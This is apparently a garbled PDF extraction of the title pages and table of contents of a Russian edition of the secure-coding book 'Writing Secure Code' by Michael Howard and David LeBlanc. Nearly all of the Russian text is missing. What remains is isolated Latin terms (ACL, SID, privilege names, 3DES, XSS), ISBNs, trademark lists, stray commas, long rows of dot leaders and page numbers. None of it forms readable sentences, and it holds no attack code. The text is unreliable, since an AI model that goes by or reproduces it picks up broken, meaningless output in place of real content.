Writing Secure Code PDF

,
, .
, ,
, .
Michael Howard
David LeBlank
WRITING
SECURE
CODE
Second Edition
2- ,
2005
004.45
32.973.26018.2
X68
., .
X68
/. . 2 ., . .:
, 2005. 704 .: .
ISBN 9785750202386

. ,
,
, ,
.
C# Perl.
, Win
dows Security Push Microsoft.
, ,
, ,
, , ,
.
24 , 5 ,
.
004.45
32.973.26018.2
Microsoft Corporation, ,
, .
Active Directory, ActiveX, Authenticode, Hotmail, JScript, Microsoft, Microsoft Press, MSDN, MSDOS,
Visual Basic, Visual C++, Visual Studio, Win32, Windows, Windows NT
Microsoft / .
.
, , , Web, ,
, , , ,
, , , Web, ,
, .
ISBN 0735617228 (.)

ISBN 9785750202386
,
Microsoft Corporation, 2003
, Microsoft Corporation,
20032004
,
, 2005
XX
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . XXI
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . XXII
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . XXII
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . XXII
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . XXIII
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . XXIII
Web . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6
! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11

. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16
1: ,
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17
2: ,
. . . . . . . . . . . . . . . . . . . . . . . . 17
3: ,
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17
4: ,
. . . . . . . . . . . . . . . . . . . . . . . . . . . 18
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18
VI
19
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
,
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . .
, . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
,
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
, . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
34
35
36
36
36
36
37
37
38
38
39
39
39
40
40
40
41
41
41
3 ,

43
SD : , . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
21
22
24
25
25
26
26
27
27
28
31
34
34
43
44
45
45
46
46
VII
, . . . . . . . . . . . . . . . . .
. . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . .
,
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
, ,
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
57
57
58
58
59
60
48
49
50
51
53
55
55
55

. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 61
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 62
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 63
, . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 71
. . . . . . . . . . . . . . . . . . 79
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 90
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 92
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 92
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 93
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 97

. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 98
, . . . . . . . . . . . . . . . . . . 99
, , MAC . . . . . . . . . . . . . . . . . . . . . . . . . . . . 99
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 100
, . . . . 100
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 101
, . . . . . . . . . . . . . . . . . . . 101
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 102
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 106
I I
1:
107
108
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 109
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 118
VIII
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 123
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 125
Unicode ANSI . . . . . . . . . . . . . . . . . . 130
, Unicode . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 132
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 132
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 133
. . . . . . . . . . 142
/GS Visual C++ .NET . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 143
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 146
147
ACL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 147
: . . . . . . . . . . . . . . . . . . . . . . . . 149
ACL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 150
ACL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 153
ACE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 155
ACL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 155
ACL Windows NT 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 155
ACL Windows 2000 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 159
ACL Active Template Library . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 162
ACE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 164
SID
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 166
DACL ACE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 167
DACL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 169
ACE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 169
, DACL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 170
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 170
.NET Framework . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 171
COM+ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 172
IP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 173
SQL Server . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 174
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 174
. . . . . . . . . . . . . . 175
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 176
177
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 178
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 178
Web . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 179
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 180
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 180
SeBackupPrivilege . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 181
SeRestorePrivilege . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 184
IX
SeDebugPrivilege . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 184
SeTcbPrivilege . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 185
SeAssignPrimaryTokenPrivilege SeIncreaseQuotaPrivilege . . . . . . . . . 185
SeLoadDriverPrivilege . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 185
SeRemoteShutdownPrivilege . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 186
SeTakeOwnershipPrivilege . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 186
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 186
, , SID, ACL . . . . . . . . . . . . . . . . . . . . . 187
SID ,
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 188
. . . . . . . . . . . . . . 188
ACL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 188
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 189
LSA . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 189
, . . . . . . . 190
ACL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 190
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 191
LSA . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 191
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 191
1: , . . . . . . . . . . . . . . . . . . . . . . . . . . . 191
2: , API
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 192
3: , . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 193
4: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 193
5: SID . . . . 199
6: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 199
Windows XP/.NET
Server 2003 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 212
Windows .NET Server 2003 . . . . . . . . . . . . . . . . . . . . . . . . 214
, . . . . . . . . . . . . . . . 215
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 218
222
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 222
rand . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 223
Win32 . . . . . . . . . . . . . . . . . . . . . . . 225
. . . . . . . . . 230
Web . . . . . . . . . . 230
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 231
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 231
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 234
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 235
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 235
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 236
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 239
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 241
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 243
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 244
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 244
, . . . . . . . . . . . . . . . . . . 247
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 248
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 249
: , . . . . . . . . . . . . . . . . . . . . . . . 249
. . . . . . . . 254
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 255
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 256
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 256
257
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 258
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 258
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 259
PKCS #5 . . . . . . . . . . . . . . . . . . . . . . . 261
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 262
Windows 2000 . . . . . . . . . . . . . . . . . . . . . . . . . . 262
: Windows XP . . . . . . . . . . . . . . . . . . . . . . . . 265
Windows NT 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 267
Windows 95/98/Me Windows CE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 270
PnP . . . . . . . . . . . . . . . . . . . . . . . . 271
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 275
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 276
... . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 277
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 280

. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 281
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 282
. . . . . . . . . . . . . . . . . . . . . . . . . . . . 288
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 290
FAT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 290
XOR . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 290
3DES . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 290
3DES
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 290
3DES
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 291
3DES ,
,
ACL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 291
XI
3DES,
, ,
ACL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 291
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 291
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 292
10
293
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 294
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 295
, . . . . . . . . . . . . . . . . . 296
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 298
Perl . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 300
. . . . . . . . . . . . . . . . . . . . . 301
( ) . . . . . . . . . . . . . . . . . . . . . . . 303
Unicode . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 304
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 307
Perl . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 308
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 308
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 309
C++ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 310
, . . . . . . . . . . . . . . . . . . . . . . 310
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 311
11
312
. . . . . . . . . . . . . . . . . . . 313
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 313
Napster . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 313
Mac OS X Apache . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 314
DOS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 314
/tmp StarOffice
Sun . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 314
Windows . . . . . . . . . . . . . . . . . . . . . . . . 315
Web . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 321
AOL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 321
eEye . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 321
Internet Explorer 4. IP . . . . . . . . . . . . . . . . . . . . . . . . . 322
, ::$DATA Internet Information Server 4.0 . . . . . . . . . . . 323
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 324
Web . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 325
. . . . . . . . . . . . . 328
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 329
. . . . . . . . . . . . . . . . . . . . . . . . . . 329
. . . . . . . . . . . . . . 330
8.3 . . . . . . . . . . . . . . . . . . . . . . . . . . . 331
XII
PATH
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 331
. . . . . . . . . . . . . . . . . . . . . . . . . . 332
CreateFile . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 336
Web . . . . . . . . . . . . . . . . . . . . . . . . . . 336
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 336
UTF8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 336
ISAPI . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 337
: ,
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 338
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 338
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 339
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 341
12
342
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 343
1: . . . . . . . . . . . . . . . . . . . . . . . . . 345
2: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 346
1:
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 347
2: SQL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 348
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 349
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 350
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 354
13 Web-
355
: . . . . . 355
<SCRIPT> . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 359
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 359
, XSS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 360
